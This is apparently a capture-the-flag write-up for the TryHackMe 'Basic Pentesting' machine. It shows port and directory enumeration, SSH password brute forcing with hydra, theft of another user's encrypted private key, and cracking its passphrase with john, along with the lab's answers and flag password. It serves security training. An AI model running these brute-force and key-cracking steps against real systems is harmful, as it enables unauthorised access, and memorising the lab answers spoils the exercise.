Basic Pentesting

shadowmaster

9 min readJul 9, 2021

This is a machine that allows you to practise web app hacking and privilege escalation….

Task 1 : Web App Testing and Privilege Escalation

In these set of tasks you’ll learn the following:

brute forcing
hash cracking
service enumeration
Linux Enumeration

The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.
Credits to Josiah Pierce from Vulnhub.

Q. Deploy the machine and connect to our network
Ans : No Answer Needed

Explained

Start machine and connect to try hack me using openvpn or use attack box

Q. Find the services exposed by the machine
Ans : No Answer Needed

Explained

(hint) use an nmap scan to look for the open ports
Scan using nmap
. nmap -sS 10.10.68.15 (-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans)
. nmap -A 10.10.68.15 (-A: Enable OS detection, version detection, script scanning, and traceroute )
. nmap -p- 10.10.68.15( -p <port ranges>: Only scan specified ports )
. nmap -T4 10.10.68.15(-T<0–5>: Set timing template (higher is faster))

Q. What is the name of the hidden directory on the web server(enter name without /)?
(hint: use dirsearch/dirbuster to find the hidden directories.)
Ans: development

Explained

here the solution can be find by 2 methods

Method 1

Use nmap for scaning

┌──(root💀kali)-[/home/blackhat]
└─# nmap -p80 — script http-enum 10.10.68.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–09 07:44 IST
Nmap scan report for 10.10.68.15
Host is up (0.19s latency).

PORT STATE SERVICE
80/tcp open http
| http-enum:
|_ /development/: Potentially interesting directory w/ listing on ‘apache/2.4.18 (ubuntu)’
Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds

Method 2

Use the gobuster for finding the directories and files in web sites.

┌──(root💀kali)-[/home/blackhat]
└─# gobuster dir -u http://10.10.68.15/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.68.15/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/09 07:52:01 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 316] [ → http://10.10.68.15/development/]
Progress: 685 / 220561 (0.31%) Progress: 705 / 220561 (0.32%)

Q. User brute-forcing to find the username & password.
Ans: No Ans Needed

Explained

Here we use enum4linux -a 10.10.155.54 command

┌──(root💀kali)-[/home/blackhat]
└─# enum4linux -a 10.10.155.54
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 4 05:38:35 2021

==========================
| Target Information |
==========================
Target ……….. 10.10.155.54
RID Range …….. 500–550,1000–1050
Username ……… ‘’
Password ……… ‘’
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

==================================================================
| Users on 10.10.155.54 via RID cycling (RIDS: 500–550,1000–1050
==================================================================

[I] Found new SID: S-1–22–1
[I] Found new SID: S-1–5–21–2853212168–2008227510–3551253869
[I] Found new SID: S-1–5–32
[+] Enumerating users using SID S-1–22–1 and logon username ‘’, pas
S-1–22–1–1000 Unix User\kay (Local User)
S-1–22–1–1001 Unix User\jan (Local User)

[+] Enumerating users using SID S-1–5–32 and logon username ‘’, pas
S-1–5–32–500 *unknown*\*unknown* (8)
S-1–5–32–501 *unknown*\*unknown* (8)
S-1–5–32–502 *unknown*\*unknown* (8)
S-1–5–32–503 *unknown*\*unknown* (8)
S-1–5–32–504 *unknown*\*unknown* (8)
S-1–5–32–505 *unknown*\*unknown* (8)
S-1–5–32–506 *unknown*\*unknown* (8)
^CS-1–5–32–507 *unknown*\*unknown* (8)

Q. What is the username?
Ans: jan

Q. What is the password?
Ans: armando

EXPLAINED

Here we use hydra
hydra -l jan -P /directory_path/rockyou.txt ssh://ip -t 4

Q. What is the password?
Ans: armando

┌──(root💀kali)-[/home/blackhat]
└─# hydra -l jan -P /home/blackhat/Desktop/rockyou.txt ssh://10.10.178.171 -t 4s
Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak — Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021–07–10 01:03:23
[WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.178.171:22/
[STATUS] 41.00 tries/min, 41 tries in 00:01h, 14344357 to do in 5831:03h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344314 to do in 8538:17h, 4 active
[STATUS] 29.00 tries/min, 203 tries in 00:07h, 14344195 to do in 8243:48h, 4 active
[STATUS] 27.07 tries/min, 406 tries in 00:15h, 14343992 to do in 8832:31h, 4 active
[22][ssh] host: 10.10.178.171 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021–07–10 01:32:36

Q. What service do you use to access the server(answer in abbreviation in all caps)?
Ans: SSH

┌──(root💀kali)-[/home/blackhat/Desktop]
└─# ssh jan@10.10.160.185
The authenticity of host ‘10.10.160.185 (10.10.160.185)’ can’t be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘10.10.160.185’ (ECDSA) to the list of known hosts.
jan@10.10.160.185’s password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0–119-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$

Q. Enumerate the machine to find any vectors for privilege escalation
Ans: No ans needed

hint : use a privilege escalation checklist or tool like LinEnum

Q. What is the name of the other user you found(all lower case)?

Ans: Kay

Explained:

┌──(root💀kali)-[/home/blackhat]
└─# enum4linux -a 10.10.155.54
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 4 05:38:35 2021

Q. If you have found another user, what can you do with this information?
hint: apart from a password, how else can a user access a machine?

Ans: No ans needed

After getting the user name and password

follow the steps

step1: use ssh connection to jan
ssh jan@ <ip>

┌──(root💀kali)-[/home/blackhat]
└─# ssh jan@10.10.98.3

Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type ‘yes’, ‘no’ or the fingerprint: yes
Warning: Permanently added ‘10.10.98.3’ (ECDSA) to the list of known hosts.
jan@10.10.98.3’s password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0–119-generic x86_64)
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$

Step 2 : Afer logging in
try ls command
or try cd .. and go to find the directories jan and kay
after finding the directories jan and kay

note the command

jan@basic2:~$
jan@basic2:~$
jan@basic2:~$ ls
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd jan/
jan@basic2:~$ ls
jan@basic2:~$ cd ..
jan@basic2:/home$ cd kay/
jan@basic2:/home/kay$ ls
pass.bak
jan@basic2:/home/kay$ cat pass.bak
cat: pass.bak: Permission denied
jan@basic2:/home/kay$

here we couldnt ready the pass.bak file

then now use the command ls -al
jan@basic2:/home/kay$ ls -al
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw — — — — 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r — r — 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r — r — 1 kay kay 3771 Apr 17 2018 .bashrc
drwx — — — 2 kay kay 4096 Apr 17 2018 .cache
-rw — — — — 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw — — — — 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r — r — 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r — r — 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw — — — — 1 root kay 538 Apr 23 2018 .viminfo

Note here we use the .ssh file is to

here we take this ssh file because we have to check the permissions, that is chmod 777 it is to confirm that the file is accessed by the others, thats why we choose .ssh because it has execute permission for others.

Result

jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls
authorized_keys , id_rsa , id_rsa.pub

here use cat command for viewing the content

jan@basic2:/home/kay/.ssh$ cat id_rsa
— — -BEGIN RSA PRIVATE KEY — — -
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

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
— — -END RSA PRIVATE KEY — — -

Now save the content in a file using nano command or by direct saving method.

Then lets use john the ripper
Now run ssh2john tool to get the hash of the keys.

python /usr/share/john/ssh2john.py key>key1.txt

┌──(root💀kali)-[/home/blackhat]
└─# python /usr/share/john/ssh2john.py key>key1.txt

here my file is key. and then follow this command.

Now run John the ripper tool to crack the passphrase for the account of Kay.

john — wordlist=rockyou.txt sshkeyshash.txt

┌──(root💀kali)-[/home/blackhat]
└─# john — wordlist=rockyou.txt key1.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press ‘q’ or Ctrl-C to abort, almost any other key for status
beeswax (key)
Warning: Only 1 candidate left, minimum 4 needed for performance.
1g 0:00:00:06 DONE (2021–07–10 07:47) 0.1605g/s 2302Kp/s 2302Kc/s 2302KC/s *7¡Vamos!
Session completed

here beeswax is the password for kay

now use the command ssh -i /home/kay/.ssh/id_rsa kay@10.10.98.3

jan@basic2:/home/kay/.ssh$ ssh -i /home/kay/.ssh/id_rsa kay@10.10.98.3
Could not create directory ‘/home/jan/.ssh’.
The authenticity of host ‘10.10.98.3 (10.10.98.3)’ can’t be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? y
Please type ‘yes’ or ‘no’: yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key ‘/home/kay/.ssh/id_rsa’:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0–119-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$

Q. What is the final password you obtain?
Ans: heresareallystrongpasswordthatfollowsthepasswordpolicy$$